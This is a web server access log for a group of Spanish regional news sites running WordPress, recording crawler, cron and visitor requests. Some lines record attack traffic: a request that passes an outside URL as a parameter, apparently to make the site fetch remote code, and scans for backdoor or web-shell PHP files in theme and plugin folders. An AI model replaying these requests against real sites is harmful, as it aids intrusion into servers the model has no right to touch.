82.165.88.0 - - [03/Feb/2024:13:50:02 +0100] "POST /wp-cron.php?doing_wp_cron=1706964602.5095539093017578125000 HTTP/1.1" 200 - cronicareinodearagon.com "-" "WordPress/6.2.2; https://cronicareinodearagon.com" "-"
52.167.144.0 - - [03/Feb/2024:13:50:02 +0100] "GET /wp-json/complianz/v1/ HTTP/1.1" 200 1947 cronicareinodearagon.com "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" "-"
185.6.9.0 - - [03/Feb/2024:13:51:51 +0100] "GET /sitemap_index.xml HTTP/1.1" 200 317 cronicareinodearagon.com "-" "Mozilla/5.0 (Linux; Android 9; BDL8051C Build/BDL3552T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/66.0.3359.158 Safari/537.36" "-"
185.12.250.0 - - [03/Feb/2024:13:51:51 +0100] "GET /robots.txt HTTP/1.1" 200 188 cronicadehuelva.com "-" "Mozilla/5.0 (Linux; Android 9; BDL8051C Build/BDL3552T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/66.0.3359.158 Safari/537.36" "-"
82.165.88.0 - - [03/Feb/2024:13:51:52 +0100] "POST /wp-cron.php?doing_wp_cron=1706964711.9705700874328613281250 HTTP/1.1" 200 - cronicareinodearagon.com "-" "WordPress/6.2.2; https://cronicareinodearagon.com" "-"
5.133.192.0 - - [03/Feb/2024:13:51:52 +0100] "GET /humans.txt HTTP/1.1" 404 596 cronicadehuelva.com "-" "Mozilla/5.0 (Linux; Android 9; BDL8051C Build/BDL3552T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/66.0.3359.158 Safari/537.36" "-"
5.133.192.0 - - [03/Feb/2024:13:51:52 +0100] "GET /ads.txt HTTP/1.1" 404 596 cronicadehuelva.com "-" "Mozilla/5.0 (Linux; Android 9; BDL8051C Build/BDL3552T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/66.0.3359.158 Safari/537.36" "-"
185.12.251.0 - - [03/Feb/2024:13:51:52 +0100] "GET / HTTP/1.1" 200 336 cronicadehuelva.com "-" "Mozilla/5.0 (Linux; Android 9; BDL8051C Build/BDL3552T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/66.0.3359.158 Safari/537.36" "-"
85.208.96.0 - - [03/Feb/2024:13:52:11 +0100] "GET /sociedad/vriuela-mono-andalucia-malaga/ HTTP/1.1" 200 158966 cronicareinodearagon.com "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)" "-"
82.165.88.0 - - [03/Feb/2024:13:52:55 +0100] "POST /wp-cron.php?doing_wp_cron=1706964775.4349908828735351562500 HTTP/1.1" 200 - cronicareinodearagon.com "-" "WordPress/6.2.2; https://cronicareinodearagon.com" "-"
182.22.30.0 - - [03/Feb/2024:13:52:55 +0100] "GET /robots.txt HTTP/1.1" 200 202 cronicareinodearagon.com "-" "Mozilla/5.0 (compatible; Y!J-WSC/1.0; +https://yahoo.jp/3BSZgF)" "-"
202.239.4.0 - - [03/Feb/2024:13:52:58 +0100] "GET / HTTP/1.1" 200 41655 cronicareinodearagon.com "-" "Mozilla/5.0 (compatible; Y!J-WSC/1.0; +https://yahoo.jp/3BSZgF)" "-"
74.125.209.0 - - [03/Feb/2024:13:53:01 +0100] "GET /category/educacion/feed/ HTTP/1.1" 200 16487 cronicareinodearagon.com "-" "FeedFetcher-Google; (+http://www.google.com/feedfetcher.html)" "-"
68.183.182.0 - - [03/Feb/2024:13:53:12 +0100] "GET /rindex.php?parameter=RxRmlrbf.php%7Chttp://ndot.us/za&action=add HTTP/1.1" 301 309 cronicareinodearagon.com "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" "-"
68.183.182.0 - - [03/Feb/2024:13:53:13 +0100] "GET /rindex.php?parameter=RxRmlrbf.php%7Chttp://ndot.us/za&action=add HTTP/1.1" 404 144868 cronicareinodearagon.com "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" "-"
68.183.182.0 - - [03/Feb/2024:13:53:14 +0100] "GET /RxRmlrbf.php HTTP/1.1" 301 253 cronicareinodearagon.com "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" "-"
68.183.182.0 - - [03/Feb/2024:13:53:15 +0100] "GET /RxRmlrbf.php HTTP/1.1" 404 144874 cronicareinodearagon.com "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" "-"
68.183.182.0 - - [03/Feb/2024:13:53:17 +0100] "GET /wp-content/themes/classic/inc/index.php HTTP/1.1" 301 280 cronicareinodearagon.com "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" "-"
68.183.182.0 - - [03/Feb/2024:13:53:18 +0100] "GET /wp-content/themes/classic/inc/index.php HTTP/1.1" 301 - cronicareinodearagon.com "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" "-"
68.183.182.0 - - [03/Feb/2024:13:53:19 +0100] "GET /wp-content/themes/classic/inc/ HTTP/1.1" 301 - cronicareinodearagon.com "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" "-"
68.183.182.0 - - [03/Feb/2024:13:53:20 +0100] "GET /sociedad/incendio-almonte-donana/ HTTP/1.1" 200 38588 cronicareinodearagon.com "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" "-"
68.183.182.0 - - [03/Feb/2024:13:53:21 +0100] "GET /wp-content/themes/classic/inc/RxRbcxqq.php HTTP/1.1" 301 283 cronicareinodearagon.com "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" "-"
68.183.182.0 - - [03/Feb/2024:13:53:22 +0100] "GET /wp-content/themes/classic/inc/RxRbcxqq.php HTTP/1.1" 404 144968 cronicareinodearagon.com "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" "-"
68.183.182.0 - - [03/Feb/2024:13:53:23 +0100] "GET /wp-content/themes/classic/inc/index.php HTTP/1.1" 301 280 cronicareinodearagon.com "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" "-"
68.183.182.0 - - [03/Feb/2024:13:53:24 +0100] "GET /wp-content/themes/classic/inc/index.php HTTP/1.1" 301 - cronicareinodearagon.com "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" "-"
68.183.182.0 - - [03/Feb/2024:13:53:25 +0100] "GET /wp-content/themes/classic/inc/ HTTP/1.1" 301 - cronicareinodearagon.com "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" "-"
68.183.182.0 - - [03/Feb/2024:13:53:25 +0100] "GET /sociedad/incendio-almonte-donana/ HTTP/1.1" 200 38588 cronicareinodearagon.com "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" "-"
68.183.182.0 - - [03/Feb/2024:13:53:26 +0100] "GET /wp-content/themes/classic/inc/RxRhbngv.php HTTP/1.1" 301 283 cronicareinodearagon.com "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" "-"
68.183.182.0 - - [03/Feb/2024:13:53:28 +0100] "GET /wp-content/themes/classic/inc/RxRhbngv.php HTTP/1.1" 404 144968 cronicareinodearagon.com "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" "-"
68.183.182.0 - - [03/Feb/2024:13:53:29 +0100] "GET /wp-content/plugins/core-stab/index.php HTTP/1.1" 301 279 cronicareinodearagon.com "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" "-"
68.183.182.0 - - [03/Feb/2024:13:53:30 +0100] "GET /wp-content/plugins/core-stab/index.php HTTP/1.1" 301 - cronicareinodearagon.com "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" "-"
68.183.182.0 - - [03/Feb/2024:13:53:30 +0100] "GET /wp-content/plugins/core-stab/ HTTP/1.1" 404 144924 cronicareinodearagon.com "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" "-"
68.183.182.0 - - [03/Feb/2024:13:53:32 +0100] "GET /wp-content/plugins/core-stab/RxRtvvxf.php HTTP/1.1" 301 282 cronicareinodearagon.com "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" "-"
68.183.182.0 - - [03/Feb/2024:13:53:32 +0100] "GET /wp-content/plugins/core-stab/RxRtvvxf.php HTTP/1.1" 404 144964 cronicareinodearagon.com "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" "-"
68.183.182.0 - - [03/Feb/2024:13:53:34 +0100] "GET /wp-content/plugins/core-stab/index.php HTTP/1.1" 301 279 cronicareinodearagon.com "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" "-"
68.183.182.0 - - [03/Feb/2024:13:53:35 +0100] "GET /wp-content/plugins/core-stab/index.php HTTP/1.1" 301 - cronicareinodearagon.com "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" "-"
68.183.182.0 - - [03/Feb/2024:13:53:35 +0100] "GET /wp-content/plugins/core-stab/ HTTP/1.1" 404 144924 cronicareinodearagon.com "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" "-"
68.183.182.0 - - [03/Feb/2024:13:53:37 +0100] "GET /wp-content/plugins/core-stab/RxRrdyib.php HTTP/1.1" 301 282 cronicareinodearagon.com "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" "-"
68.183.182.0 - - [03/Feb/2024:13:53:38 +0100] "GET /wp-content/plugins/core-stab/RxRrdyib.php HTTP/1.1" 404 144964 cronicareinodearagon.com "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" "-"
68.183.182.0 - - [03/Feb/2024:13:53:39 +0100] "GET /wp-content/plugins/core-stab/index.php HTTP/1.1" 301 279 cronicareinodearagon.com "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" "-"
68.183.182.0 - - [03/Feb/2024:13:53:41 +0100] "GET /wp-content/plugins/core-stab/index.php HTTP/1.1" 301 - cronicareinodearagon.com "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" "-"
82.165.88.0 - - [03/Feb/2024:13:53:42 +0100] "POST /wp-cron.php?doing_wp_cron=1706964822.0496931076049804687500 HTTP/1.1" 200 - cronicareinodearagon.com "-" "WordPress/6.2.2; https://cronicareinodearagon.com" "-"
68.183.182.0 - - [03/Feb/2024:13:53:42 +0100] "GET /wp-content/plugins/core-stab/ HTTP/1.1" 404 144924 cronicareinodearagon.com "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" "-"
68.183.182.0 - - [03/Feb/2024:13:53:43 +0100] "GET /wp-content/plugins/core-stab/RxRghlow.php HTTP/1.1" 301 282 cronicareinodearagon.com "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" "-"
68.183.182.0 - - [03/Feb/2024:13:53:44 +0100] "GET /wp-content/plugins/core-stab/RxRghlow.php HTTP/1.1" 404 144964 cronicareinodearagon.com "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" "-"
185.191.171.0 - - [03/Feb/2024:13:56:10 +0100] "GET /aragon/espadas-ve-claro-adelanto-electoral/ HTTP/1.1" 200 160360 cronicareinodearagon.com "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)" "-"
82.165.88.0 - - [03/Feb/2024:13:56:11 +0100] "POST /wp-cron.php?doing_wp_cron=1706964971.4112360477447509765625 HTTP/1.1" 200 - cronicareinodearagon.com "-" "WordPress/6.2.2; https://cronicareinodearagon.com" "-"
101.44.249.0 - - [03/Feb/2024:13:56:26 +0100] "GET /aragon/el-biogas-como-aliado-en-la-descarbonizacion-tematica-de-jornada-de-itainnova-circe-y-clenar/ HTTP/1.1" 301 341 cronicareinodearagon.com "http://cronicareinodearagon.com/aragon/el-biogas-como-aliado-en-la-descarbonizacion-tematica-de-jornada-de-itainnova-circe-y-clenar/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" "-"
101.44.249.0 - - [03/Feb/2024:13:56:28 +0100] "GET /aragon/el-biogas-como-aliado-en-la-descarbonizacion-tematica-de-jornada-de-itainnova-circe-y-clenar/ HTTP/1.1" 200 34208 cronicareinodearagon.com "https://cronicareinodearagon.com/aragon/el-biogas-como-aliado-en-la-descarbonizacion-tematica-de-jornada-de-itainnova-circe-y-clenar/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" "-"
134.209.106.0 - - [03/Feb/2024:13:58:19 +0100] "GET / HTTP/1.1" 200 336 cronicadevalencia.com "-" "Go-http-client/1.1" "-"
134.209.106.0 - - [03/Feb/2024:13:58:19 +0100] "GET //cjfuns.php HTTP/1.1" 404 596 cronicadevalencia.com "-" "Go-http-client/1.1" "-"
134.209.106.0 - - [03/Feb/2024:13:58:20 +0100] "GET //wp-head.php HTTP/1.1" 404 596 cronicadevalencia.com "-" "Go-http-client/1.1" "-"
134.209.106.0 - - [03/Feb/2024:13:58:20 +0100] "GET //class.api.php HTTP/1.1" 404 596 cronicadevalencia.com "-" "Go-http-client/1.1" "-"
134.209.106.0 - - [03/Feb/2024:13:58:20 +0100] "GET //st.php HTTP/1.1" 404 596 cronicadevalencia.com "-" "Go-http-client/1.1" "-"
134.209.106.0 - - [03/Feb/2024:13:58:20 +0100] "GET //my1.php HTTP/1.1" 404 596 cronicadevalencia.com "-" "Go-http-client/1.1" "-"
54.36.148.0 - - [03/Feb/2024:13:59:43 +0100] "GET /educacion/practicas-estudiantes-internacionales-medio-rural/ HTTP/1.1" 200 34375 cronicareinodearagon.com "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "-"
44.242.175.0 - - [03/Feb/2024:14:00:30 +0100] "GET / HTTP/1.1" 200 336 cronicadeasturias.com "-" "Opera/9.80 (J2ME/MIDP; Opera Mini/8.0.35626/37.8918; U; en) Presto/2.12.423 Version/12.16" "-"
44.242.175.0 - - [03/Feb/2024:14:00:30 +0100] "GET / HTTP/1.1" 200 336 cronicadesevilla.com "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.141 YaBrowser/22.3.3.855 Yowser/2.5 Safari/537.36" "-"
44.242.175.0 - - [03/Feb/2024:14:00:30 +0100] "GET / HTTP/1.1" 200 336 cronicadeextremadura.com "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0) Asus;Galaxy6" "-"
44.242.175.0 - - [03/Feb/2024:14:00:30 +0100] "GET / HTTP/1.1" 200 336 cronicadearagon.com "-" "Mozilla/5.0 (Linux; Android 11; RMX2117) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Mobile Safari/537.36" "-"
44.242.175.0 - - [03/Feb/2024:14:00:30 +0100] "GET / HTTP/1.1" 200 336 cronicadecadiz.com "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/600.8.9 (KHTML, like Gecko) Maxthon/4.5.2" "-"
44.242.175.0 - - [03/Feb/2024:14:00:31 +0100] "GET / HTTP/1.1" 200 336 cronicademalaga.com "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/28.0.1469.0 Safari/537.36" "-"
44.242.175.0 - - [03/Feb/2024:14:00:31 +0100] "GET / HTTP/1.1" 200 336 cronicadejaen.com "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-US) AppleWebKit/528.16 (KHTML, like Gecko, Safari/528.16) OmniWeb/v622.8.0" "-"
44.242.175.0 - - [03/Feb/2024:14:00:31 +0100] "GET / HTTP/1.1" 200 336 cronicadelpaisvalenciano.com "-" "Mozilla/5.0 (Linux; Android 10; ONEPLUS A5010) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Mobile Safari/537.36" "-"
44.242.175.0 - - [03/Feb/2024:14:00:31 +0100] "GET / HTTP/1.1" 200 336 cronicadegranada.com "-" "Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian" "-"
44.242.175.0 - - [03/Feb/2024:14:00:32 +0100] "GET / HTTP/1.1" 200 336 cronicadecordoba.com "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36" "-"
44.242.175.0 - - [03/Feb/2024:14:00:33 +0100] "GET / HTTP/1.1" 200 336 cronicadevalencia.com "-" "Opera/9.80 (X11; Linux i686) Presto/2.12.388 Version/12.16" "-"
44.242.175.0 - - [03/Feb/2024:14:00:34 +0100] "GET / HTTP/1.1" 200 41737 cronicareinodearagon.com "-" "Mozilla/5.0 (Linux; Android 4.0.4; BNTV400 Build/IMM76L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Safari/537.36" "-"
44.242.175.0 - - [03/Feb/2024:14:00:34 +0100] "GET / HTTP/1.1" 200 336 cronicadealmeria.com "-" "Mozilla/5.0 (compatible; Konqueror/4.5; FreeBSD) KHTML/4.5.4 (like Gecko)" "-"
44.242.175.0 - - [03/Feb/2024:14:00:34 +0100] "GET / HTTP/1.1" 200 336 cronicadehuelva.com "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36 OPR/86.0.4363.59" "-"
216.73.160.0 - - [03/Feb/2024:14:01:19 +0100] "GET // HTTP/1.1" 301 241 cronicareinodearagon.com "-" "Go-http-client/1.1" "-"
82.165.88.0 - - [03/Feb/2024:14:01:22 +0100] "POST /wp-cron.php?doing_wp_cron=1706965282.3834960460662841796875 HTTP/1.1" 200 - cronicareinodearagon.com "-" "WordPress/6.2.2; https://cronicareinodearagon.com" "-"
216.73.160.0 - - [03/Feb/2024:14:01:22 +0100] "GET / HTTP/1.1" 200 41651 cronicareinodearagon.com "http://cronicareinodearagon.com//" "Go-http-client/2.0" "-"
216.73.160.0 - - [03/Feb/2024:14:01:25 +0100] "GET ///wp-content/uploads/ HTTP/1.1" 301 260 cronicareinodearagon.com "-" "Go-http-client/1.1" "-"
216.73.160.0 - - [03/Feb/2024:14:01:26 +0100] "GET /wp-content/uploads/ HTTP/1.1" 403 775 cronicareinodearagon.com "http://cronicareinodearagon.com///wp-content/uploads/" "Go-http-client/2.0" "-"
216.73.160.0 - - [03/Feb/2024:14:01:27 +0100] "GET ///wp-content/plugins/ HTTP/1.1" 301 260 cronicareinodearagon.com "-" "Go-http-client/1.1" "-"
216.73.160.0 - - [03/Feb/2024:14:01:27 +0100] "GET /wp-content/plugins/ HTTP/1.1" 200 - cronicareinodearagon.com "http://cronicareinodearagon.com///wp-content/plugins/" "Go-http-client/2.0" "-"
216.73.160.0 - - [03/Feb/2024:14:01:29 +0100] "GET ///wp-admin/admin-ajax.php HTTP/1.1" 301 264 cronicareinodearagon.com "-" "Go-http-client/1.1" "-"
216.73.160.0 - - [03/Feb/2024:14:01:30 +0100] "GET /wp-admin/admin-ajax.php HTTP/1.1" 400 1 cronicareinodearagon.com "http://cronicareinodearagon.com///wp-admin/admin-ajax.php" "Go-http-client/2.0" "-"
216.73.160.0 - - [03/Feb/2024:14:01:33 +0100] "GET ///wp-content/themes/twenty/twenty.php HTTP/1.1" 301 276 cronicareinodearagon.com "-" "Go-http-client/1.1" "-"
216.73.160.0 - - [03/Feb/2024:14:01:34 +0100] "GET /wp-content/themes/twenty/twenty.php HTTP/1.1" 404 144912 cronicareinodearagon.com "http://cronicareinodearagon.com///wp-content/themes/twenty/twenty.php" "Go-http-client/2.0" "-"
216.73.160.0 - - [03/Feb/2024:14:01:36 +0100] "GET ///wp-content/patior/ HTTP/1.1" 301 259 cronicareinodearagon.com "-" "Go-http-client/1.1" "-"
216.73.160.0 - - [03/Feb/2024:14:01:38 +0100] "GET /wp-content/patior/ HTTP/1.1" 404 144856 cronicareinodearagon.com "http://cronicareinodearagon.com///wp-content/patior/" "Go-http-client/2.0" "-"
216.73.160.0 - - [03/Feb/2024:14:01:40 +0100] "GET ///wp-includes/js/tinymce/plugins/compat3x/css/index.php HTTP/1.1" 301 294 cronicareinodearagon.com "-" "Go-http-client/1.1" "-"
23.22.35.0 - - [03/Feb/2024:14:01:41 +0100] "GET /wp-json/wp/v2/posts/5161 HTTP/1.1" 200 7274 cronicareinodearagon.com "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot)" "-"
82.165.88.0 - - [03/Feb/2024:14:01:43 +0100] "POST /wp-cron.php?doing_wp_cron=1706965303.4036600589752197265625 HTTP/1.1" 200 - cronicareinodearagon.com "-" "WordPress/6.2.2; https://cronicareinodearagon.com" "-"
216.73.160.0 - - [03/Feb/2024:14:01:43 +0100] "GET /wp-includes/js/tinymce/plugins/compat3x/css/index.php HTTP/1.1" 301 - cronicareinodearagon.com "http://cronicareinodearagon.com///wp-includes/js/tinymce/plugins/compat3x/css/index.php" "Go-http-client/2.0" "-"
216.73.160.0 - - [03/Feb/2024:14:01:44 +0100] "GET /wp-includes/js/tinymce/plugins/compat3x/css/ HTTP/1.1" 403 775 cronicareinodearagon.com "https://cronicareinodearagon.com/wp-includes/js/tinymce/plugins/compat3x/css/index.php" "Go-http-client/2.0" "-"
216.73.160.0 - - [03/Feb/2024:14:01:45 +0100] "GET ///dropdown.php HTTP/1.1" 301 253 cronicareinodearagon.com "-" "Go-http-client/1.1" "-"
216.73.160.0 - - [03/Feb/2024:14:01:46 +0100] "GET /dropdown.php HTTP/1.1" 404 144840 cronicareinodearagon.com "http://cronicareinodearagon.com///dropdown.php" "Go-http-client/2.0" "-"
216.73.160.0 - - [03/Feb/2024:14:01:50 +0100] "GET ///wp-includes/Text/about.php HTTP/1.1" 301 267 cronicareinodearagon.com "-" "Go-http-client/1.1" "-"
216.73.160.0 - - [03/Feb/2024:14:01:51 +0100] "GET /wp-includes/Text/about.php HTTP/1.1" 404 144884 cronicareinodearagon.com "http://cronicareinodearagon.com///wp-includes/Text/about.php" "Go-http-client/2.0" "-"
216.73.160.0 - - [03/Feb/2024:14:01:53 +0100] "GET ///wp-includes/rest-api/about.php HTTP/1.1" 301 271 cronicareinodearagon.com "-" "Go-http-client/1.1" "-"
216.73.160.0 - - [03/Feb/2024:14:01:54 +0100] "GET /wp-includes/rest-api/about.php HTTP/1.1" 404 144896 cronicareinodearagon.com "http://cronicareinodearagon.com///wp-includes/rest-api/about.php" "Go-http-client/2.0" "-"
216.73.160.0 - - [03/Feb/2024:14:01:57 +0100] "GET ///ee.php HTTP/1.1" 301 247 cronicareinodearagon.com "-" "Go-http-client/1.1" "-"
216.73.160.0 - - [03/Feb/2024:14:01:58 +0100] "GET /ee.php HTTP/1.1" 404 144822 cronicareinodearagon.com "http://cronicareinodearagon.com///ee.php" "Go-http-client/2.0" "-"
216.73.160.0 - - [03/Feb/2024:14:02:00 +0100] "GET ///wp-admin/install.php HTTP/1.1" 301 261 cronicareinodearagon.com "-" "Go-http-client/1.1" "-"
216.73.160.0 - - [03/Feb/2024:14:02:02 +0100] "GET /wp-admin/install.php HTTP/1.1" 200 1366 cronicareinodearagon.com "http://cronicareinodearagon.com///wp-admin/install.php" "Go-http-client/2.0" "-"
216.73.160.0 - - [03/Feb/2024:14:02:03 +0100] "GET ///wp-content/plugins/install.php HTTP/1.1" 301 271 cronicareinodearagon.com "-" "Go-http-client/1.1" "-"
216.73.160.0 - - [03/Feb/2024:14:02:04 +0100] "GET /wp-content/plugins/install.php HTTP/1.1" 404 144896 cronicareinodearagon.com "http://cronicareinodearagon.com///wp-content/plugins/install.php" "Go-http-client/2.0" "-"
216.73.160.0 - - [03/Feb/2024:14:02:05 +0100] "GET ///wp-content/install.php HTTP/1.1" 301 263 cronicareinodearagon.com "-" "Go-http-client/1.1" "-"
216.73.160.0 - - [03/Feb/2024:14:02:06 +0100] "GET /wp-content/install.php HTTP/1.1" 404 144871 cronicareinodearagon.com "http://cronicareinodearagon.com///wp-content/install.php" "Go-http-client/2.0" "-"
216.73.160.0 - - [03/Feb/2024:14:02:08 +0100] "GET ///install.php HTTP/1.1" 301 252 cronicareinodearagon.com "-" "Go-http-client/1.1" "-"
44.242.175.0 - - [03/Feb/2024:14:02:08 +0100] "GET //pagead2.googlesyndication.com/pagead/js/adsbygoogle.js HTTP/1.1" 301 - cronicareinodearagon.com "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A5362a Safari/604.1" "-"
44.242.175.0 - - [03/Feb/2024:14:02:08 +0100] "GET //cronicareinodearagon.com/wp-content/plugins/elementor/assets/lib/waypoints/waypoints.min.js HTTP/1.1" 301 - cronicareinodearagon.com "-" "Mozilla/5.0 (Linux; Android 11; RMX2161) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.85 Mobile Safari/537.36" "-"
